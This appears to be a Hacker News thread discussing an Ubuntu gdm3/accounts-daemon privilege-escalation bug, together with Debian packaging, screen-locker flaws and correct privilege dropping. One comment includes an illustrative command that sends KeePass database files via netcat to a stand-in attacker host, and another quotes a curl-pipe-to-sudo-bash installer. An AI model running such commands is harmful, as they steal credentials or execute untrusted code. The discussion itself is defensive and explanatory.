You could say that Debian offers a reliable platform and it's the users' fault for installing these unreliable things on top of it. But an OS exists to run applications, not the other way around, and I find that in practice Debian's approach means users are forced to step outside the managed parts of it much more than with other distributions, and it handles it less well when they do, making for setups that are less reliable in practice. Put it this way: the "add-on repository" culture is a lot stronger in Debian/Ubuntu than in other distributions, and I think that's actually a weakness rather than a strength.


> Debian's patches to cdrecord introduced so many bugs that they eventually ended up driving the original author away from open source.

That's not how I remember it. I remember distros (Debian and others) patching cdrecord, which resulted in the upstream author getting furious and re-licensing cdrecord under a non-free license to stop them. Of course the software was then forked, and the author indeed ragequit free software development. People can read more of the story here: https://en.wikipedia.org/wiki/Cdrtools#License_compatibility...

There's a reason stuff like this is named after Schilling: https://mako.cc/copyrighteous/award

> I think I remember something about the python 2 -> 3 transition being harder on Debian because of changes they've made?

No? There was no transition. 2 and 3 coexisted, 2 was recently removed.

> The packaged Tomcat on Debian is so different that every time I've seen someone running Tomcat they've installed it manually instead.

Different as in file layout?

> Debian has essentially given up on packaging Hadoop. Some of their criticisms of its build process are certainly valid, but others seem to be an unreasonable expectation that everything will build exactly the way Debian expects. E.g. if I'm understanding correctly, they essentially take the position that they won't package anything built with Maven, on frankly spurious grounds.

Hadoop is not buildable with non-bundled dependencies, as far as I understand. This violates Policy. We were discussing reliability – am I missing something here?

> Debian tends to end up with very outdated versions of anything from an ecosystem that uses large numbers of small libraries, or, basically, anything that isn't written in C or Perl. E.g. Python libraries are typically a long way out of date (even compared to other distributions),

Can you show some examples?

> and Debian's package management tends to be less compatible with Python's built-in tools like pip

This is just not true.

> than other distributions (e.g. Debian is more likely to rename a Python library, in my experience, which then breaks reverse-dependencies on that library or leads to having two incompatible copies of it installed)

The package names are often renamed, but not the Python modules.

> You could say that Debian offers a reliable platform and it's the users' fault for installing these unreliable things on top of it. But an OS exists to run applications, not the other way around

Python libraries are hardly applications.

> Put it this way: the "add-on repository" culture is a lot stronger in Debian/Ubuntu than in other distributions, and I think that's actually a weakness rather than a strength.

Add-on repos are frowned upon in Debian.


> I remember distros (Debian and others) patching cdrecord, which resulted in the upstream author getting furious and re-licensing cdrecord under a non-free license to stop them.

Right, because he was getting blamed for bugs introduced by those patches.

> Hadoop is not buildable with non-bundled dependencies, as far as I understand. This violates Policy. We were discussing reliability – am I missing something here?

Well, if you can't install programs you want to use, that's not reliable. My point is that in practice you end up with an awkward mix of system-managed and non-managed programs installed, because there's a lot that Debian is unwilling to package, and such a system becomes unreliable, particularly when those system-managed packages diverge from their upstreams.

> Python libraries are hardly applications.

No, but in the Python ecosystem it's normal for new versions of an application to require relatively up-to-date versions of a large number of small libraries. So the applications end up very out of date. I think there was a post here not so long ago from the Debian side about how it's increasingly unsustainable to try to include programs from ecosystems with a small-library mentality in Debian.

> Add-on repos are frowned upon in Debian.

And yet I've seen far more of them being made for Debian than for other distributions.


> What is a distribution if not a collection of software that obey the same standard?

Why would that definition make any sense?


For those of you that don't like that terminology: let's just use the words that Debian itself uses, namely "the universal operating system". What is an operating system if not a collection of software that follow a standard so as to interoperate?


> What is an operating system if not a collection of software that follow a standard so as to interoperate?

I have never heard that definition of an operating system, but it seems that every university & place has its own so we're all speaking different languages anyways when using that word :-)


When you use Nix, and Nix does it, you like it when they do it, because otherwise the software doesn't work (Nix doesn't use the default FHS).


Slightly offtopic, but a common exploit(?) I frequently see with Linux desktop environments is a few seconds where the user's live desktop is displayed after resuming from standby, before the logon screen comes up. Not exactly a case of obtaining control of one's computer, but could be effectively used through repetition to transcribe any sensitive content that may have been onscreen.

It always struck me as a very strange phenomenon to occur given the apparent security superiority of Linux in contrast to Windows. Perhaps that's an antiquated notion now, given modern distros that prioritise form-over-function more than they used to?


The security superiority of Linux in contrast to Windows is rooted in its server/headless form - all of that changes as soon as you start good old X

Wayland is supposed to fix most of those legacy shortcomings, enabling proper app-level sandboxing. It took a while, but its implementations are more or less usable as daily drivers these days - if you're interested in desktop security, helping to push Wayland to become a hassle-free replacement for X is appreciated a lot.


On the other hand, has Wayland figured out how to allow screen shots, screen sharing in video meetings, live streaming your screen and such things yet?


Yep, those things work (though both GNOME and KDE still have unstable compositors, so take that as you will).

There is also pipewire going somewhat stable (I had issues with bluetooth but otherwise it worked perfectly); that would enable all these things without applications having to worry about the compositor at all.


For the longest time we've been unable to get ActivityWatch [1] (an open-source automated time-tracker) to work reliably on Wayland due to the inability in many Wayland DEs to retrieve the title and app name of the active window.

Things have improved recently (in part due to our own efforts to submit PRs to DEs), but we still need one implementation per DE more or less, since many don't implement the "common" Wayland protocol to accomplish this (Gnome, KDE).

[1]: https://activitywatch.net


The issue is that you still need to sandbox your apps; if you sandbox your apps, you could probably create a sandbox around X too. So far most Wayland+Flatpak apps are not secure, but the GUIs advertise them as sandboxed.


Linux screen lockers are somewhat notorious for security-ish bugs like that. There's a project called XSecureLock that aims to address some of those, although I'm not sure if it fixes (or can fix) the resume-from-RAM type of bug you detailed.

https://github.com/google/xsecurelock


When configured properly, xsecurelock does fix this type of bug. The key is to use the -l option of xss-lock, which passes a lock file descriptor to xsecurelock and waits for it to be closed before allowing the suspend.

https://github.com/google/xsecurelock#automatic-locking


That's really useful, thank you! Great to know that others share the same security concerns around this process. I will be sure to try this out.


> security superiority of Linux in contrast to Windows

This doesn't exist. Linux is more secure on the desktop because it doesn't attract hackers with its 1% market share and because its users are more tech savvy.

Arguably otherwise Windows has better defense because it comes with built-in virus scanner. Also both systems pretty much don't have any sane security policy for the end user at all by default, because they both are trying to defend from the wrong threat - privilege escalation, - which is irrelevant for desktop users 90% of the time.


This is a common argument but the truth here is that Linux is deployed _far_ more commonly than Windows. Just not in a desktop context.

I understand you clarified with “on the desktop” but the best practices that exist on Linux: (signed/audited/centralised) packages, mandatory access control, running as a standard user, etc are things which Windows is only just catching up with.

There are holes, but saying Windows is more secure because it's been attacked more ignores a huge part of the problem Windows has had for generations: running as admin when you shouldn't and sticking the UI into the kernel.


Windows hasn't run anything as admin by default for a decade now. Every action that requires elevated privileges asks for permission via UAC, same as (gk)sudo but more secure.

> the best practices that exist on Linux: (signed/audited/centralised) packages, mandatory access control, running as a standard user

These are standard practices on every OS that every sane admin implements. Again, just because someone's grandma runs Windows 95 as Administrator doesn't make modern deployments less secure. Also, by far the most popular command on Linux is something like `curl -sL https://deb.nodesource.com/setup_12.x | sudo bash`. Do we need to discuss how your security configuration is irrelevant once you run this? This doesn't even require Xorg, and see the part about 'sudo' below.

> sticking the UI into the kernel

Last time I checked, Xorg was running as root pretty much everywhere, which is not at all different from a security perspective.

But then again, privilege escalation is not the main risk for desktop user, because their data is readable by their OS account, doesn't matter if the account has admin privileges or not. If any of your desktop software is exploited via numerous vulnerabilities, or you ran a custom script from the internet like the one above - even without sudo - you are pretty much fucked, because these things can install a keylogger as the current user and/or add a cron job or a daemon (again as the current user) which will do an obfuscated analog of `find ~ -name keepass.kdbx -print0 | xargs -0 cat | nc evil.haxxor.ru 1234`, and it will go unnoticed for years.

The security model of both Linux and Windows is so far behind the real world that it doesn't make any sense to discuss which one of them is more secure.


> Last time I checked, Xorg was running as root pretty much everywhere

Xorg hasn't needed to run as root for a long time; kernel mode setting (KMS) removed the main reason for it to run as root. Its successor (Wayland) never runs as root (unless, of course, your user is root itself).

> But then again, privilege escalation is not the main risk for desktop user, because their data is readable by their OS account

The current push towards sandboxing (flatpak, sandboxed browser processes, etc) makes privilege escalation relevant for desktop users again.


Using the settings used by most people, which do not show pop-ups when parts of Windows use privileges, is exactly as secure as allowing every program to do whatever it wants. It’s not a security boundary and exploits for it are not counted or fixed.


> > security superiority of Linux in contrast to Windows. Perhaps that's an antiquated notion now

> This doesn't exist.

It does exist, but as mentioned by the parent comment, that security superiority of Linux in contrast to Windows is a reputation it earned in the late 1990s and early 2000s; back then (before Windows XP SP2), Windows was a security disaster. Both Windows and Linux got better at security since then.

> Arguably otherwise Windows has better defense because it comes with built-in virus scanner.

Back then (before Windows Vista), it didn't. And one could also argue that this might be because Windows needs a virus scanner more than Linux does.


This actually used to be a common problem I would have on macOS, especially when docked to an external display. I wonder if these problems are connected somehow.


I think it’s just a fundamental problem of running a program that is essentially like any other that covers the screen.


I can see how that could come about (lumping window manager concerns all into the one bucket), but to me its security implications make a good case for re-architecting this part of the system. I.e. having a separate part of the OS which marshals access to the visible desktop when transitioning between ACPI states.

For hardware-accelerated compositing situations, it might have something to do with unnecessarily long / out-of order retention of the GPU frame buffer, which I could conceive of as being dismissed as inconsequential in most circumstances.


Locking screens properly and securely is not entirely trivial.

There is some writing from the author of xscreensaver which makes for fun reading. Displaying the desktop for a few seconds could be the least of your worries. There have been multiple security issues in the past in various screen lockers that let you completely bypass the password screen (probably all fixed today, but who knows what else could be lurking).

I won't link it directly because I think (?) his site displays something else when your Referer header is hacker news. This should provide you with an entry point, and there are multiple other linux screensaver issues over the past years linked from that post.

https://www.google.com/search?q=jwz xscreensaver "The awful thing about getting it right the first time is that nobody realizes how hard it was."

You can also search for "XScreenSaver: On Toolkit Dialogs", but I think it's linked in that blog post.


It is entirely off-topic, and I have observed exactly the same phenomenon. I have also felt the same reaction - "Isn't Linux 'better'?"

I have a 20.04 thinkpad that I rarely use for reasons (partly that it doesn't come out of suspend most of the time, forcing a hard reboot) but I remember this being a problem back when my Ubuntu install was functional :)


> partly that it doesn't come out of suspend most of the time, forcing a hard reboot

I had the same problem with my T14s (AMD). Installing kernel 5.8 via `apt install linux-generic-hwe-20.04-edge` solved the suspend issue for me.


> a few seconds where the user's live desktop is displayed after resuming from standby

I would be surprised if this isn't configurable. In fact, I'm pretty sure that XScreenSaver has exactly this "fade" parameter as a number of seconds and can be disabled. No idea about other screensavers.


What?.. How could you generalize this across all of "Linux"? Or did you mean something else?

I know what you're talking about, and I'm pretty sure it's a very GNOME-specific problem (or gdm, or whatever login manager they use by default...) because when I started out on Ubuntu earlier this year, there was a very active bug report about it. I could actually probably find it if anyone was curious.

But I've long since ditched gnome because well, I hate it. On KDE now and never had this problem. I'm pretty sure this is not an "all of linux" problem at all though.


I use KDE and I have this problem. Similarly when I switch vterms (I have separate X11-Sessions for my personal and my work-from-home user account), I can briefly see the content of the session that I switched away from (without having locked it) before the lockscreen comes up.


Yes, you're right, I think I've picked up a little confirmation bias based on my choice of distro lineage (in hindsight all have been some derivation of Ubuntu, with some variant of a Gnome 2 / 3 desktop environment). I guess where I was coming from was that I would have expected some mechanism at the lower level of the OS to marshal this kind of behaviour, rather than it being trusted to the window manager. Maybe this stems from security being mainly thought of as a terminal / ssh-level concern, rather than the GUI.

I will give KDE a go!


This was maybe an issue back in the day but should be fixed now. logind has a PrepareForSleep event and a lock mechanism to let the lock screen show up before the machine goes to sleep.
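
A minimal sketch of that mechanism (not code from any of the projects discussed; "example-locker" and the build command are assumptions), using libsystemd's sd-bus API to take a "delay" inhibitor lock so a locker gets a chance to engage before the suspend actually happens:

  /* Build (assumption): gcc inhibit.c $(pkg-config --cflags --libs libsystemd) */
  #include <stdio.h>
  #include <unistd.h>
  #include <systemd/sd-bus.h>

  int main(void)
  {
      sd_bus *bus = NULL;
      sd_bus_error error = SD_BUS_ERROR_NULL;
      sd_bus_message *reply = NULL;
      int fd = -1;

      if (sd_bus_open_system(&bus) < 0)
          return 1;

      /* org.freedesktop.login1.Manager.Inhibit(what, who, why, mode) -> fd */
      int r = sd_bus_call_method(bus,
                                 "org.freedesktop.login1",
                                 "/org/freedesktop/login1",
                                 "org.freedesktop.login1.Manager",
                                 "Inhibit", &error, &reply, "ssss",
                                 "sleep", "example-locker",
                                 "lock the screen before suspend", "delay");
      if (r < 0) {
          fprintf(stderr, "Inhibit failed: %s\n", error.message);
          return 1;
      }

      if (sd_bus_message_read(reply, "h", &fd) < 0)
          return 1;
      fd = dup(fd);  /* the fd is owned by the message; keep our own copy */

      /* ...wait for logind's PrepareForSleep(true) signal, lock the screen,
       * then close(fd) to let the suspend continue... */

      close(fd);
      sd_bus_message_unref(reply);
      sd_bus_error_free(&error);
      sd_bus_unref(bus);
      return 0;
  }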


I didn't see it mentioned in the article, so just to clarify, this was fixed with https://ubuntu.com/security/notices/USN-4616-1


How can you tell if an Ubuntu 20.04 server has this fix?


The article states that server isn't affected, because it requires access to a graphical desktop session.

Edit with direct quote from the article:

> Disclaimer: For someone to exploit this vulnerability, they need access to the graphical desktop session of the system, so this issue affects desktop users only.

Am I wrong?


It's somewhat common to install a graphical environment on server machines, particularly if they need to run certain (Oracle) enterprise software, for which GUI tools are either the only option, or by far the most expected and documented solution. Of course in theory you could install the bare minimum to run the utility using X-forwarding, in practice anyone doing this usually installs a full environment because it's much simpler to manage.

Plus, there are a few admins out there who simply prefer to use VNC over a straight terminal. I'm not here to judge; while this is uncommon, it's certainly not unheard of. Personally I would rather not have that much attack surface on my servers, but there are a few legitimate use cases here and there.


> It's somewhat common to install a graphical environment on server machines

It's really not that common. Yes there's the odd cases of servers that use enterprise software that have to have GUIs, but most linux boxes run headless. GUIs are just a waste of processing power and resources for the large majority of the things that servers are used for.

That said, I'm not happy that Canonical are entirely discounting the possibility that customers will have desktop environments installed on servers. It's not common, but it does happen.


I think this requires both a desktop environment to be installed, and local access to the server to be exploited (in most cases: X server is configured not to allow remote access by default in Ubuntu afaik).

The core vulnerability is in gdm which means that you have to have that running as a system service.

Though on second thought, if one can easily set up X forwarding as an unprivileged user, it might still be trivially exploitable.

Anyway, the announcement means that Ubuntu has fixes in affected (desktop) packages. If they are installed on a server, they'd be fixed with next apt update/upgrade too: they use the same package repositories.


One thing to note is that depending on how your network is structured and firewalled, if _one_ server has a graphical env of some sort (maybe a ML/image processing server that has graphical environments installed)... root access could be nasty nonetheless.

I never install GUIs on my servers, but when deploying an image processing server, while installing another package to debug CUDA/drivers, I unintentionally added a full windowing system without realising it.


Unfortunately, nvidia-settings requires xorg to be installed and running (even when run in cli mode), and it's pretty much the only way to control fan speeds on consumer GPUs.


If you install a GUI on Ubuntu Server it simply becomes Ubuntu Desktop.

There's no difference between the two, except for the presence of the GUI software.

Simply go apt install ubuntu-desktop on any server and you got yourself a desktop install.


Only if the server has no GUI installed. I worked at a place where the Network Admin had a bunch of older RedHat servers with GUIs. I had to become the "bad guy" because I refused to install a GUI on the newer boxes I was in charge of, and a bunch of devs pissed and moaned because they couldn't use xterm to connect to the new servers. It was a pretty backwards place.


We run some machine learning systems on Ubuntu server, and it's really easy to accidentally install the full desktop environment while installing random graphics-driver-related packages. While figuring out how to set things up (before I formalized it in an ansible script), one of the servers ended up with the desktop packages installed. Weird to look at the IPMI overview and, between all the white-on-black kernel log output, suddenly see a full Ubuntu desktop boot screen.


At the risk of igniting an irrelevant flame war, this is one of the primary reasons why I use Vim and only Vim as my IDE. I don't have to care about lack of graphical environments ;-)


Side note from a long-time (and still current) vim developer who also uses JetBrains IDE products...

I'd pay similar money for a similarly robust vim plugin from a supported vendor with great support and sane keybindings OOTB.

Man, it's easy to get spoiled with tons of RAM and a great IDE.


Yes, I don't know if anybody will ever see this, but I agree! I would gladly pay similarly for a robust vim plugin setup that gave me similar features across a range of languages.


You can use "apt-cache policy", for example. This way you can see the current installed version of a package in your system, and also if there's a newer version you can install (the candidate).

  $ apt-cache policy accountsservice
  accountsservice:
    Installed: 0.6.40-2ubuntu11.6
    Candidate: 0.6.40-2ubuntu11.6
If the installed version reported by the utility is the version in which Ubuntu says the problem was fixed for your release, then presumably your system is safe (for this bug).


Check if the installed version is equal to or higher than one of the listed fixed versions. Likely it isn't even installed on a server edition.


Assuming the server can reach the normal apt repos, you could run: sudo apt update; apt list --upgradable

And grep for this package. Otherwise

sudo apt update

/usr/lib/update-notifier/apt-check --human-readable

will list the number of pending security updates.

(part of update-notifier-common, and in task:server along with various desktop-tasks)

Beyond that, you might want to look at https://vuls.io or other auditing packages. Or perhaps:

sudo snap install cvescan

cvescan

Seems it could use some exposure - I wasn't aware of it: https://github.com/canonical/sec-cvescan


The real problem is here:

> It uses D-Bus to ask accounts-daemon how many users there are, but since accounts-daemon is unresponsive, the D-Bus method call fails due to a timeout. (In my testing, the timeout took around 20 seconds.) Due to the timeout error, the code does not set the value of priv->have_existing_user_accounts. Unfortunately, the default value of priv->have_existing_user_accounts is false, not true, so now gdm3 thinks that there are zero user accounts and it launches gnome-initial-setup.

I am sick and tired of programs trying to continue onward somehow after encountering "impossible" error conditions or tripping over arbitrary timeouts. Failing fast when something looks funny is essential to the creation of a secure system. When you write something like the gdm3 code above --- which, when it runs into trouble, clears any ambient error and pretends that the system has no current users --- you may think you're doing the user a favor by continuing to operate, but what you're doing is in fact willfully entering some unknowable and unexplored region of the system's state space, usually one full of dragons and anthrax.

What you want to do instead is just die when something goes wrong. gdm3 should respond to a failure to contact org.freedesktop.Accounts with either a hard lockup or a forced restart of the gdm3 daemon.
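
To make that concrete, here is a toy sketch (count_users() is a made-up stand-in for the D-Bus query, not gdm3's actual code) of treating a failed query as fatal instead of as "zero users":

  #include <stdio.h>
  #include <stdlib.h>

  /* Stand-in for the D-Bus query to accounts-daemon; -1 means the call
   * failed (e.g. timed out), which must not be confused with "0 users". */
  static int count_users(void)
  {
      return -1;  /* simulate the ~20 second D-Bus timeout */
  }

  int main(void)
  {
      int n = count_users();
      if (n < 0) {
          fprintf(stderr, "cannot determine user count; refusing to start initial setup\n");
          return EXIT_FAILURE;  /* die (or restart) instead of assuming n == 0 */
      }
      if (n == 0)
          puts("no accounts exist: first-boot setup is appropriate");
      return EXIT_SUCCESS;
  }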


The code I currently write is for internal use and it's made with usability in mind, so I am guilty of coding stuff like this on occasion. By that I mean that my code, under certain circumstances, assumes the best and continues moving forward.

I do this for a specific reason: I don’t want my team to get pinged with a support request for something trivial.

So this type of bug is a huge eye opener for me. I still want to strike a balance between usability and clarity, but this story makes me want to review a lot of the code I’ve written. None of it is mission critical and on this level, luckily.


I've found that I spend more time debugging arcane horrible things that go wrong as downstream consequences of recovery paths than I do debugging straightforward and obvious problem reports that come from hard assertion failures and failing fast.


While the DoS of accounts-daemon is bad, it seems like the real problem here is that gdm3 running with broken/absent/etc. accounts-daemon will believe there are no accounts even though there may be? Surely this is extremely trusting behaviour on gdm3's part and should also be fixed?

But all the updated versions are for accountsservice, not gdm3. Do they change the 'default' response somehow?



Ah, cool. That's good. The CVE for that appears to be https://nvd.nist.gov/vuln/detail/CVE-2020-16125 and it was fixed in 3.36.2 or 3.38.2.


The first documentation I could find about accounts-daemon by googling is this:

https://utcc.utoronto.ca/~cks/space/blog/linux/UbuntuAccount...

Not reassuring.


In my over twenty years of using Linux, this is the first I had heard of "accounts-daemon", and I'm the kind of nerd who browses repositories for fun, looking for new and interesting packages.

So I googled "accounts-daemon", and these are the titles for the first three results:

  1. "What does accounts-daemon actually do?"
  2. "Should I disable accounts-daemon?"
  3. "Process accounts-daemon taking 100% of CPU."
Not reassuring indeed.


It's accountsservice: https://gitlab.freedesktop.org/accountsservice/accountsservi...

It's an API and associated service daemon to add/remove/modify users, since Linux does not have one of those. (except forking out to useradd/usermod/userdel, except on Debian where they supply the adduser/rmuser commands instead, because consistency is for chumps, I guess)


Not “instead”. The adduser/rmuser commands are in addition to useradd/usermod/userdel, which are more low-level.


browsed the repo 30s and found this commit https://gitlab.freedesktop.org/accountsservice/accountsservi...

    Never delete the root filesystem when removing users
    Many, many user accounts use / as their home directory. 
    If deleting these accounts with accountsservice, we should just ignore requests to 
    delete the home dir, rather than trash the user's computer.

    Fixes #57


Slightly off-topic, but why on Earth does something like this need to be written in C?


It's from the freedesktop folks. (Like systemd, dbus, pulseaudio, and all sorts of other services to make linux more 'desktop' friendly)


Yeah, that's a windmill I've given up tilting at. And it has gotten better, but mostly through painful learning experiences like this one. But some days I wonder if I'd just be better off moving to OpenBSD or heck Plan 9 or Inferno.


I switched to FreeBSD and haven't looked back - from an admin perspective it's very much like 2000s-era Linux. Less stuff works by magic, but once you configure something right it stays configured right.


> OpenBSD

Use a Thinkpad that's not too new? OK without 802.11ac and Bluetooth?

Come take a dip, the water is just fine.


Wait, why can't OpenBSD handle Bluetooth? Is it just that the same chip is used for both wireless protocols and it doesn't support them yet?


Not a hardware issue, but a protocol issue. It used to be supported for limited devices (mostly HID) but the implementation was poorly designed and overly complicated. It was pulled out in 5.6 and its absence has not annoyed a developer enough to replace it.


>OpenBSD

Don't bother. OpenBSD's performance is atrocious. I hear dragonflyBSD actually has first-class multiprocessor support, and have always wanted to try it out.


Software in different security tiers shouldn't be compared on the basis of performance.

I don't care if my OS is faster if it's being used to compromise my systems, eh?

It's like, if you take the armor off a tank it will go faster, sure, but don't ride it into battle.


I don't think the OpenBSD security claim is as great as it sounds. Unless you are only running sshd and pf, you are beyond their "default install" and heavily into packages and ports.

Is gnome 3 on OpenBSD significantly more secure than on Linux? I very much doubt it.


I dare you to go ask that on the OpenBSD mailing list.

No seriously. I don't know. I'd like to know.

We don't have to speculate and bloviate. Go ask them.

https://www.openbsd.org/mail.html


Can anyone help me understand this part?

> Dropping privileges means that the daemon temporarily forfeits its root privileges, adopting instead the lower privileges of the user. Ironically, that’s intended to be a security precaution, the goal of which is to protect the daemon from a malicious user who does something like symlinking their .pam_environment to /etc/shadow, which is a highly sensitive file that standard users aren’t allowed to read. Unfortunately, when done incorrectly, it also grants the user permission to send the daemon signals, which is why we’re able to send accounts-daemon a SIGSEGV.

What’s the recommended way to drop permissions while blocking the ability to kill the process (sure you can mask off SIGSEGV but SIGKILL isn’t maskable)?

Also, the wording makes it sound like you can re-acquire the original permissions which I thought is impossible. Isn’t dropping permissions a one-way operation? I would have thought there was some usage of fork here but the usage of `pidof` and 1 result in the write up would imply no forking. Maybe a link to the source here would be sufficient for me (I don’t see one in the article or in the thread here).


Answering my own question. Found the bug report: https://bugs.launchpad.net/ubuntu/+source/accountsservice/+b...

Accountsservice is actually changing its user ID rather than dropping capabilities, which is where my confusion came from. It looks like there's magic in the kernel to allow a process to switch back to the original user, and some nuance about some ways of switching allowing you to send signals, while other ways make your process act like a semi-hybrid of two user accounts (i.e. it technically looks owned by your user, but you still don't have permission to do things with it). Security issues always lie in these kinds of weird nuances.


it strikes me that the serious bug here is the design of GDM to check accounts-daemon for existing accounts, and if that check times out, start account creation. Regardless of the nominal protections afforded by the system, if you rely on a daemon that accepts unprivileged user input to provide security-critical answers, and fail open if it doesn't respond, that's a bad idea.


Maybe GDM shouldn't even have the privilege to create a new account in the first place. Couldn't every privileged operation be requested through accounts-daemon?


yup. think it's fine to have a service that manages accounts, but a timeout in contacting it resulting in the start of a process that creates users (with privileges) is definitely no good. would be interesting to understand how it happened. is it a straight up bug? is it some sort of fallback in gdm to work around non-responsive account-service (potentially on new machines)? is it some sort of backwards compatibility thing? i can't imagine that it was coded that way intentionally, would be interesting to understand how it ended up that way...


Agreed, login manager should be saner (less relying on other processes) than that. Also, the very existence of accounts-daemon concept seems to be a mistake from the security and simplicity point of view.


I like slim Linux machines and I have several times considered removing or at least disabling accountsservice. It has never been clear to me why you need such a service as long as /etc/passwd is world readable. So from this article I learn:

* calling mount during installation(?) when there is no user. Makes no sense to have the daemon running later

* providing a user icon. Exactly the type of functionality I like to throw out

* providing a user specific language setting. I can see that this is useful for some users

So how is dropping privileges done correctly to avoid getting killed by the user? Running as another user is one way, but I guess that is not always feasible if you want the daemon to provide services for the user. On the other hand, accountsservice is there for multiple (human) users. So as which of them is it running? Not at a machine right now...


> So how is dropping privileges done correctly to avoid getting killed by the user?

I think you got the wrong idea from the article, which is partly the author's fault. He claims the user should not be able to do that, but that is a highly anti-user, anti-unix viewpoint.

Creating and destroying (crashing) processes running with the uid of any non-root user is something like an obvious inalienable right of that unix user. It is expected that this works.

The problem to solve is that the crash of the user daemon confuses gdm (a root process) which then behaves as if the computer is in the installation phase and the user is to be trusted with setting up high-privilege account.

The solution for Ubuntu is obvious, fix gdm. For administrators / power users, use something simpler such as xdm, where these kinds of errors are unlikely to occur.


> So how is dropping privileges done correctly to avoid getting killed by the user?

I was wondering this too. What is the way to "correctly" drop privileges? Is it even possible to drop privileges within a process in a way that's immune to this?


There is no “tried and true” method to drop privileges after you’re done with them; this has been a constant source of headaches and security issues for pretty much any app that needs to be started as root in order to xxx (eg bind to a low port, if we pretend that’s the only way) and then drop said privileges.

The solution is almost always to use (or add) kernel constructs that would obviate the need to elevate in the first place, but they generally aren’t fine-grained enough so on paper it looks like dropping privileges makes more sense, though in practice it might turn out to be the bigger mistake.


The more or less default way to accomplish this (i.e. setuid(2)) is immune to that issue. On the other hand, it does not really drop privileges in the modern sense, as the process can regain them at any time because it is still owned by root.


No, a privileged process can't regain privileges after setuid(2).


Drop them in a subprocess, read the file and send the data to the parent?


Logged in to one of my machines via ssh: the daemon is running with all uids being 0 and full capabilities. I don't see how that would be dropping any privileges. On the other hand:

* The machine has no desktop user at the moment

* The program was patched on 04-Nov, I guess addressing this issue.


The program only temporarily drops privileges while reading the user-supplied file. The rest of the time, it would have all uids as 0 and full capabilities.


I guess you could fork first?


Fork then handle child/exec error codes appropriately.


Right, if the child runs as the user, the parent still running as root can reliably handle the situation that the user killed the child.

Don't remember having seen that. Well, sshd does it, but for more obvious reasons than handling signals.
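
A rough sketch of that pattern (illustrative only, not code from accountsservice or sshd): the parent keeps its privileges, the child fully drops to the user before touching anything user-controlled, and the parent can tell from waitpid() whether the child was killed rather than treating its silence as a normal answer.

  #include <stdio.h>
  #include <sys/types.h>
  #include <sys/wait.h>
  #include <unistd.h>

  /* Read a user-controlled file with the user's own uid/gid in a child
   * process, so a user killing the reader only kills the child. */
  static void read_user_file_as(uid_t uid, gid_t gid, const char *path)
  {
      pid_t pid = fork();
      if (pid < 0)
          return;
      if (pid == 0) {                       /* child */
          if (setgid(gid) != 0 || setuid(uid) != 0)
              _exit(112);                   /* never read the file as root */
          FILE *f = fopen(path, "r");
          /* ...parse the file, report results over a pipe... */
          if (f)
              fclose(f);
          _exit(f ? 0 : 1);
      }
      int status;                           /* parent */
      if (waitpid(pid, &status, 0) > 0 && WIFSIGNALED(status))
          fprintf(stderr, "reader killed by signal %d: treat as an error, "
                          "not as an empty answer\n", WTERMSIG(status));
  }

  int main(void)
  {
      /* Demo: dropping to our own ids works even without root. */
      read_user_file_as(getuid(), getgid(), ".pam_environment");
      return 0;
  }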


Forking does not affect the possibility to receive signals, does it?


seteuid(uid) if you want to revert later.


> So how is dropping privileges done correctly to avoid getting killed by the user?

For this case of temporarily lowering access rights so the user can't trick the daemon into reading unauthorized files: by only setting the effective user ID (EUID) (or the filesystem user ID (FSUID), though its use should be avoided nowadays) instead of the real user ID (RUID) as the code did. And the same for the group ID.
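
Roughly like this (a sketch that assumes the daemon starts as root; it is not accountsservice's actual code): the saved UID/GID stay 0, so privileges can be restored afterwards, and because the real UID never changes, the unprivileged user cannot signal the process the way they could after setresuid(uid, uid, -1).

  #include <stdio.h>
  #include <sys/types.h>
  #include <unistd.h>

  /* Lower only the effective ids around the untrusted read, then restore. */
  static void read_pam_environment(uid_t uid, gid_t gid, const char *path)
  {
      if (setegid(gid) != 0 || seteuid(uid) != 0)
          return;                        /* refuse to read the file as root */

      FILE *f = fopen(path, "r");        /* opened with the user's rights */
      /* ...parse LANG / LC_* here... */
      if (f)
          fclose(f);

      /* The saved ids are still 0, so restoring is permitted. */
      if (seteuid(0) != 0 || setegid(0) != 0) {
          /* in a real root daemon this would be a fatal error */
      }
  }

  int main(void)
  {
      /* Demo call; a real daemon would run as root and pass the target
       * user's ids (restoring to 0 simply fails when run unprivileged). */
      read_pam_environment(getuid(), getgid(), ".pam_environment");
      return 0;
  }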


> I has never been clear to me why you need such service as long as /etc/passwd is world readable.

And you access that using the POSIX getpwent(3) family of functions, which glibc wraps to honor nsswitch.conf. accountsservice seems superfluous.


On Linux, set your fsuid instead. And do it in a subprocess you can kill to avoid the DoS.


Agreed. Why would you need to run a daemon for the latter two points? These requirements can just as easily be handled by storing files in a fixed location in the user’s home directory.


What's amusing is that this is a classic 30+ year old symlink exploit. Interesting how classic most of the exploits coming up are, almost as if the current generation doesn't know the lessons of the past...


It's not quite a classic symlink exploit. Normally, the purpose of a symlink exploit is to get a privileged process to leak information about a file you don't have access to.

Here, as the article mentions, part of the attack relies on the fact that the privileged process goes out of its way to defend against such an attack.

As far as I can tell, the symlink is not even necessary. You should be able to get the same effect by making the file 1TB big. Using sparse files, you don't even need much disk space.


What I find amusing is that the code for reading that .pam_environment file is broken: https://git.launchpad.net/ubuntu/+source/accountsservice/tre...

Basically, if LANG or LC_ALL is split across two of the 50-byte reads of the file, it'll fail to find it.


it would be 50-byte regions of any given line, right?


They don't even take that into account, which is another issue. They just look for those two strings in any 50 byte block, so if you have FOO=LANG\n that'll count as having LANG set.


fgets reads a line, not 50 chars


fgets reads until the next newline character, or at most size-1 characters. For arbitrary inputs, a loop like that sets ret to TRUE if the given prefix (i.e. LANG) is found at the beginning of any line, i.e. starting at the first column – or for longer lines, if it is found starting at the 50th column (or 99th column, etc.)

I don't know enough of the format of the .pam_environment file to tell whether that may lead to unexpected results.
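
A small illustration of that pitfall (not the accountsservice source): with a 50-byte buffer, one fgets() call is not one line, so a prefix check fires for whatever chunk happens to start with "LANG" (possibly the middle of a long line) and can miss a real LANG= entry that straddles two chunks.

  #include <stdio.h>
  #include <string.h>

  int main(void)
  {
      char buf[50];
      FILE *f = fopen(".pam_environment", "r");
      if (!f)
          return 1;

      /* Each iteration sees at most 49 bytes, which may be a whole short
       * line, the start of a long one, or a slice from its middle. */
      while (fgets(buf, sizeof buf, f) != NULL) {
          if (strncmp(buf, "LANG", 4) == 0)
              printf("chunk treated as a LANG setting: %.45s\n", buf);
      }
      fclose(f);
      return 0;
  }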


Well this vindicates my years of keeping policykit and all that other nonsense off my systems (sadly haven't found a way to zap dbus). The less code you have the less opportunities there are to screw something up.


